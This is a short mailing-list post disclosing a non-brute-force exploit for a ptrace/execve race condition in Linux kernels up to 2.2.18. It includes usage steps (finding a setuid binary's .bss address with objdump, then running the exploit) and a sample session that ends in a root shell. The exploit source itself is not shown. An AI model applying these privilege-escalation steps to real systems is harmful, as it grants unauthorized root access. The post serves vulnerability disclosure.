ptrace/execve race condition exploit (non brute-force)

[Wojciech Purczynski <wp () ELZABSOFT PL>]

Hi,

Here is exploit for ptrace/execve race condition bug in Linux kernels up
to 2.2.18.

It works even on openwall patched kernels (including broken fix in 2.2.18ow4)
if you use address of BSS section in memory (use objdump -h /suid/binary
to get .bss section address).

It does not use brute-force! It does only one attemt, parent process detects
exact moment of context-switch after child goes sleep in execve.

If you have some problems, ensure that suid binary you want to sploit does
not exist in disk cache.

For more info read comments in the source code.

It has been broken in two places.

Sample output:

[wp@wp /tmp]$ uname -a
Linux wp.local.elzabsoft.pl 2.2.14-5.0 #1 Tue Mar 7 21:07:39 EST 2000 i686
unknown
[wp@wp /tmp]$ objdump -h /bin/su | grep .bss
  8 .rel.bss      00000030  08048ca8  08048ca8  00000ca8  2**2
 21 .bss          000000d4  0804bf04  0804bf04  00002f04  2**2
[wp@wp /tmp]$ find / >dev/null 2>&1
[wp@wp /tmp]$ ./epcs /bin/su 0x0804bf04
Bug exploited successfully.
sh-2.03#

It works with any suid binary.

Cheers,
wp

+---------------------------------------------------------+
| Wojciech Purczyński                 Linux Administrator |
| wp () elzabsoft pl             http://www.elzabsoft.pl/~wp |
| +48604432981        http://www.elzabsoft.pl/~wp/gpg.asc |
+---------------------------------------------------------+

Attachment: epcs.c
Description: epcs